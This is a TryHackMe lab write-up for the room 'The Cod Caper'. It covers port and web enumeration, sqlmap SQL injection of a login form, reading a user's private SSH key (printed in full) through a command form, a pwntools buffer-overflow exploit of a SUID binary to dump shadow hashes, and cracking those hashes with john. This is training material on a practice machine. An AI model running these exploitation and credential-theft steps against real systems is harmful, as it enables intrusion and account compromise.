---
layout: post
title: "The Cod Caper - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - web
  - thm
  - linux
  - eop
  - sqli
  - suid
date: 2021/03/22 21:12:00
thumbnail: /images/TryHackMe/thecodcaper.jpeg
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** The Cod Caper
- **Profile:** [tryhackme.com](https://tryhackme.com/room/thecodcaper)
- **Difficulty:** Easy
- **Description**: A guided room taking you through infiltrating and exploiting a Linux system.

![The Cod Caper](/images/TryHackMe/thecodcaper.jpeg)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S nmap ffuf sqlmap haiti john
```

## Network Enumeration

Service discovery scan with nmap:

```plaintext
# Nmap 7.91 scan initiated Mon Mar 22 15:59:34 2021 as: nmap -sSVC -p- -oA nmap_full 10.10.208.86
Nmap scan report for 10.10.208.86
Host is up (0.035s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6d:2c:40:1b:6c:15:7c:fc:bf:9b:55:22:61:2a:56:fc (RSA)
|   256 ff:89:32:98:f4:77:9c:09:39:f5:af:4a:4f:08:d6:f5 (ECDSA)
|_  256 89:92:63:e7:1d:2b:3a:af:6c:f9:39:56:5b:55:7e:f9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 22 16:00:42 2021 -- 1 IP address (1 host up) scanned in 68.11 seconds
```

## Web enumeration

There is the default page of Apache httpd, let's see is there is an app deployed
behind this.

```plaintext
$ ffuf -u http://10.10.208.86/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -fc 403 -e .php,.txt,.html

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.208.86/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/big.txt
 :: Extensions       : .php .txt .html
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response status: 403
________________________________________________

administrator.php       [Status: 200, Size: 409, Words: 53, Lines: 22]
index.html              [Status: 200, Size: 10918, Words: 3499, Lines: 376]
:: Progress: [81900/81900] :: Job [1/1] :: 1112 req/sec :: Duration: [0:01:23] :: Errors: 0 ::
```

## Web exploitation

The login form seems SQL injectable:

```plaintext
$ sqlmap -u 'http://10.10.208.86/administrator.php' --method POST --data 'username=admin&password=pass' --dump
...
Database: users
Table: users
[1 entry]
+------------+----------+
| password   | username |
+------------+----------+
| secretpass | pingudad |
+------------+----------+
```

We now have access to a page (`/2591c98b70119fe624898b1e424b5e91.php`) with
a _Run command_ form.

We can run `cat /home/pingu/.ssh/id_rsa` to dump pingu private SSH key:

```plaintext
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEArfwVtcBusqBrJ02SfHLEcpbFcrxUVFezLYEUUFTHRnTwUnsU
aHa3onWWNQKVoOwtr3iaqsandQoNDAaUNocbxnNoJaIAg40G2FEI49wW1Xc9porU
x8haIBCI3LSjBd7GDhyh4T6+o5K8jDfXmNElyp7d5CqPRQHNcSi8lw9pvFqaxUuB
ZYD7XeIR8i08IdivdH2hHaFR32u3hWqcQNWpmyYx4JhdYRdgdlc6U02ahCYhyvYe
LKIgaqWxUjkOOXRyTBXen/A+J9cnwuM3Njx+QhDo6sV7PDBIMx+4SBZ2nKHKFjzY
y2RxhNkZGvL0N14g3udz/qLQFWPICOw218ybaQIDAQABAoIBAClvd9wpUDPKcLqT
hueMjaycq7l/kLXljQ6xRx06k5r8DqAWH+4hF+rhBjzpuKjylo7LskoptYfyNNlA
V9wEoWDJ62vLAURTOeYapntd1zJPi6c2OSa7WHt6dJ3bh1fGjnSd7Q+v2ccrEyxx
wC7s4Is4+q90U1qj60Gf6gov6YapyLHM/yolmZlXunwI3dasEh0uWFd91pAkVwTb
FtzCVthL+KXhB0PSQZQJlkxaOGQ7CDT+bAE43g/Yzl309UQSRLGRxIcEBHRZhTRS
M+jykCBRDJaYmu+hRAuowjRfBYg2xqvAZU9W8ZIkfNjoVE2i+KwVwxITjFZkkqMI
jgL0oAECgYEA3339Ynxj2SE5OfD4JRfCRHpeQOjVzm+6/8IWwHJXr7wl/j49s/Yw
3iemlwJA7XwtDVwxkxvsfHjJ0KvTrh+mjIyfhbyj9HjUCw+E3WZkUMhqefyBJD1v
tTxWWgw3DKaXHqePmu+srUGiVRIua4opyWxuOv0j0g3G17HhlYKL94ECgYEAx0qf
ltrdTUrwr8qRLAqUw8n1jxXbr0uPAmeS6XSXHDTE4It+yu3T606jWNIGblX9Vk1U
mcRk0uhuFIAG2RBdTXnP/4SNUD0FDgo+EXX8xNmMgOm4cJQBdxDRzQa16zhdnZ0C
xrg4V5lSmZA6R38HXNeqcSsdIdHM0LlE31cL1+kCgYBTtLqMgo5bKqhmXSxzqBxo
zXQz14EM2qgtVqJy3eCdv1hzixhNKO5QpoUslfl/eTzefiNLN/AxBoSAFXspAk28
4oZ07pxx2jeBFQTsb4cvAoFuwvYTfrcyKDEndN/Bazu6jYOpwg7orWaBelfMi2jv
Oh9nFJyv9dz9uHAHMWf/AQKBgFh/DKsCeW8PLh4Bx8FU2Yavsfld7XXECbc5owVE
Hq4JyLsldqJKReahvut8KBrq2FpwcHbvvQ3i5K75wxC0sZnr069VfyL4VbxMVA+Q
4zPOnxPHtX1YW+Yxc9ileDcBiqCozkjMGUjc7s7+OsLw56YUpr0mNgOElHzDKJA8
qSexAoGAD4je4calnfcBFzKYkLqW3nfGIuC/4oCscYyhsmSySz5MeLpgx2OV9jpy
t2T6oJZYnYYwiZVTZWoEwKxUnwX/ZN73RRq/mBX7pbwOBBoINejrMPiA1FRo/AY3
pOq0JjdnM+KJtB4ae8UazL0cSJ52GYbsNABrcGEZg6m5pDJD3MM=
-----END RSA PRIVATE KEY-----
```

Let's add it to authorized keys so we can connect over SSH:

```plaintext
$ cat /home/pingu/.ssh/id_rsa.pub > /home/pingu/.ssh/authorized_keys
```

Let's prepare the key it and connect:

```plaintext
$ chmod 600 id_rsa_pingu
$ ssh pingu@10.10.208.86 -i id_rsa_pingu
```

But the server is still asking for pingu's password.

```plaintext
$ find / -type f -iname *pass*
...
/var/cache/debconf/passwords.dat
/var/hidden/pass
/var/lib/dpkg/info/passwd.postinst
...
$ cat /var/hidden/pass
pinguapingu
```

Now we can connect over SSH.

## EoP

Let's find a binary with SUID.

```
$ pingu@ubuntu:~$ find / -perm /4000 2>/dev/null
$ pingu@ubuntu:~$ find / -perm /u=s 2>/dev/null
/opt/secret/root
...
```

The source code of the binary is given:

```c
#include "unistd.h"
#include "stdio.h"
#include "stdlib.h"
void shell(){
setuid(1000);
setgid(1000);
system("cat /var/backups/shadow.bak");
}

void get_input(){
char buffer[32];
scanf("%s",buffer);
}

int main(){
get_input();
}
```

Let's write a python script using pwntools to exploit the BoF and the backup
of the shadow file:

```python
from pwn import *
proc = process('/opt/secret/root')
elf = ELF('/opt/secret/root')
shell_func = elf.symbols.shell
payload = fit({
44: shell_func # this adds the value of shell_func after 44 characters
})
proc.sendline(payload)
proc.interactive()
```

`/etc/shadow` is dumped:

```plaintext
root:$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.:18277:0:99999:7:::
...
papa:$1$ORU43el1$tgY7epqx64xDbXvvaSEnu.:18277:0:99999:7:::
```

Let's find the hash format code for JtR with [haiti](https://github.com/noraj/haiti)
and then crack the hashes:

```plaintext
$ haiti '$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.'
SHA-512 Crypt [HC: 1800] [JtR: sha512crypt]

$ haiti '$1$ORU43el1$tgY7epqx64xDbXvvaSEnu.'
MD5 Crypt [HC: 500] [JtR: md5crypt]
Cisco-IOS(MD5) [HC: 500] [JtR: md5crypt]
FreeBSD MD5 [HC: 500] [JtR: md5crypt]

$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=sha512crypt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
love2fish        (root)
1g 0:00:01:28 DONE (2021-03-22 17:17) 0.01135g/s 2726p/s 2726c/s 2726C/s lucinha..liomessi
Use the "--show" option to display all of the cracked passwords reliably
Session completed

$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=md5crypt           
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
postman          (papa)
1g 0:00:00:00 DONE (2021-03-22 17:18) 7.692g/s 168369p/s 168369c/s 168369C/s 151088..rotary
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
